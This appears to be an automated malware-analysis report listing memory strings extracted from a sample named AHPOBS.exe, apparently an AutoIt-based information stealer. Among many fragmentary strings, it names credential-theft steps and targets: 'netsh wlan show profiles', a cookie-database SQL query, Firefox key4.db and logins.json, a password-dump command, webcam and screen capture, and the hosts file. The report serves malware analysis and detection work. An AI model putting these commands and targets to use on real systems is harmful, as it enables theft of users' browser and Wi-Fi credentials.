              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccvvbfgfgfgfermemstr_954cb1bc-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /uxaxc.exememstr_2c691196-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrome.exememstr_be6ed8b1-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /windata/memstr_7677e9c2-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \sousen.mp3memstr_fd894579-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _versioncomparememstr_060f011a-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_endonmemstr_a7f7deb8-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \baenc.dllmemstr_b5c993ea-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \bass.dllmemstr_d857d0a4-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startrememstr_03738c10-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_dx8_reverbmemstr_8c05996b-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ghbassencdllmemstr_63e56646-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ghbassdllmemstr_221a3fa2-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autoitversionmemstr_d0509910-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws_childartmemstr_c1f73426-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startrbmemstr_e174a071-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_startz>\|memstr_96b337a6-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sousnec4memstr_ac4dbb8f-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirl4memstr_aac6fbe3-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirf4memstr_a50dc9e8-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdir@4memstr_cb1141ab-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdir44memstr_17b39563-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /db.txtmemstr_0588a325-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vvytre4=m(memstr_7f94b2d0-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirmemstr_e37ab8a7-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8dsd8smemstr_4674d916-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bssettymemstr_91c54836-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hophxn5memstr_e6d64023-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirv5memstr_8940e63d-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2.4.5.0>5memstr_540d7a70-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3.3.0.0=5memstr_00a81251-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2.4.6.0memstr_8bdecd6a-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: certyumemstr_cd4bcf7d-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cameximemstr_15f93185-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7=n(memstr_8cc28ef6-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \skypememstr_b4bb0660-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_startup_bypass_versioncheckr:txmemstr_49fa8eb6-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_driver_disconnectmemstr_c9e98f1e-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wm_cap_grab_frame_nostopz;\ymemstr_7ac2ceb5-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d19m memstr_dac58fd6-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `15m!memstr_0a9ca03e-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \11m"memstr_8def83ba-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x1-m#memstr_a93f8ad9-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1)m$memstr_ffeb7b06-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p1%m%memstr_78bea7d8-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l1!m&memstr_5a1759a0-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 41m,memstr_3d981bd4-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (1}m/memstr_416306fb-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $1ym0memstr_766ff1bf-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1um1memstr_ff0489ac-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu\control panel\desktopz>\|memstr_78e79588-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdiri2memstr_96ea42eb-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bixs^2=m(memstr_5c58925e-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]28m)memstr_b2402c20-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x2;m*memstr_8b2d8bad-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w26m+memstr_7642680b-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r21m,memstr_1976c032-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mons(memstr_2ccaecfe-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q2,m-memstr_55460b33-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: webs(memstr_a2d0c018-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l2/m.memstr_acfedfde-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k2*m/memstr_347108bd-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2%m0memstr_573034cf-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: monse2 m1memstr_a81446ff-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @2#m2memstr_a2b32689-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lodrxmemstr_30c5c71d-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bejdshd!2|m=memstr_07ed0515-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2dmememstr_00c78fd2-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd.exememstr_80a06579-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: srttttymemstr_cdfa27c5-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fasilb3memstr_6b53552e-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a3<l}memstr_7abc5f10-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \3?l~memstr_1b7bf149-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p12ccv173memstr_fe573bfc-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msssx1memstr_c9b29947-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /q.lnkmemstr_22ed1bbf-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fftzzzmemstr_5dbb28ab-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \es.dllmemstr_909247f7-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wpdsdxmemstr_39258034-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lpardmemstr_636d8212-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdir`<memstr_24a22baa-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathismemstr_3b729dfc-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: phtisaxn<-omemstr_2d386994-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svhostmemstr_ea1685cb-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wparammemstr_31d337b9-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lparammemstr_384d9c8f-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lresultmemstr_a9e5ef67-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scodememstr_0cbe0e26-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nejmamemstr_c8c7ae01-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: souxcmemstr_5277be6f-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lfert|=memstr_9f6f9432-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfi=memstr_089210ad-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirc=memstr_94381ea8-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: strs^==n(memstr_17247391-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]=8n)memstr_3a41f775-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x=;n*memstr_0f08ceb4-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: strsw=6n+memstr_746c12de-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r=1n,memstr_660541d1-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathisq=,n-memstr_3ddd166f-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l=/n.memstr_537d3ff9-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k=*n/memstr_f9d5d535-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f=%n0memstr_5b03c494-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e= n1memstr_ffae6769-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @=#n2memstr_a8ac5efd-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !=|n=memstr_a2d489b4-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =dnememstr_4b4f8775-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svw1 memstr_29861b27-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: phtisaxmemstr_f02a326f-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://ip-score.com/checkip/memstr_936e0194-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netsh wlan show profiles i>memstr_d46f0a66-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \mozilla\firefox\profiles\>>memstr_6a7b0771-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __screencaptureconstant_srccopy7>memstr_f1cb54d5-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __editconstant_classnamect(,>memstr_df0d86e2-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __editconstant_sb_lineup%>memstr_23a03f85-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scripting.filesystemobject6/memstr_80f772e9-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \system32\drivers\etc\hostsmemstr_dcde6b08-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _gdiplus_imagesavetofile.inimemstr_4c88053c-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __editconstant_sb_linedownmemstr_b55c2af7-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \mozilla\firefox\profiles.inimemstr_9db28443-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __editconstant_sb_scrollcaretmemstr_5ce585fe-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _gdiplus_imageloadfromfilememstr_3e65bccf-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set variable = createobject(memstr_dbe3c38f-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __editconstant_sb_pageupmemstr_3413a191-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netsh wlan show profilesaretymemstr_a7e46b6f-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: select * from moz_cookies;x?`mmemstr_75511913-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mms://live.mp3quran.net:9976/q?ymmemstr_008f9819-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __editconstant_sb_pagedownf?rmmemstr_56f36fe9-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c pl2.exe /stext pl2.txt_?kmmemstr_b4ee666a-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }8tmamemstr_34523072-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {8vmbmemstr_1a2dae14-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gy8pmcmemstr_29923963-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w8rmdmemstr_d7742633-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8lmememstr_8f582eb2-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s8nmfmemstr_537ef94c-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q8hmgmemstr_1541ffa6-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bo8jmhmemstr_d417361c-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8dmimemstr_85ecd71c-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k8fmjmemstr_744050d8-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i8`mkmemstr_8d6c97d4-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g8bmlmemstr_3f9b1e21-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e8\mmmemstr_dd681d57-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c8^mnmemstr_aec229a9-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a8xmomemstr_c6aa049c-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _8zmpmemstr_64a4392d-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]8tmqmemstr_b7f042e0-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [8vmrmemstr_42af8f0d-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ny8pmsmemstr_b16af2d6-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w8rmtmemstr_34cc80b5-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8lmumemstr_2e551773-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s8nmvmemstr_020a0261-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q8hmwmemstr_76b1a000-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o8jmxmemstr_6a3c2183-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8dmymemstr_63e9e6ed-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k8fmzmemstr_ccdfef0b-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i8@m{memstr_853e1ab1-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g8bm|memstr_1f937c1e-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirus88memstr_d0dbaa6f-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirus58memstr_9b853e2f-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirus+8memstr_0e83901f-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gijpgquality!8memstr_eda4445e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \key4.dbmemstr_10d0469f-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \cert9.dbmemstr_03fe3413-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadirmemstr_6216c40e-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tagpointmemstr_d6f9d650-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nnpprprppdepthmemstr_12d9a38e-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \gbr.jpgmemstr_7462603d-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: snapfilememstr_3b9f26c3-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gitifcolordepthmemstr_b481f005-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gigdiptokenmemstr_742adb77-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gibmpformatmemstr_4fe05e1e-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tagiconinfomemstr_661cd653-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: debug_editymemstr_468d1fb8-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ghgdipdllmemstr_c60236ac-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nnpprprpparetmemstr_95222568-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sb_scrollcaretmemstr_677d3b71-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nnpprprppnfomemstr_d3ea6c3f-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \logins.jsonmemstr_6fe742f3-3
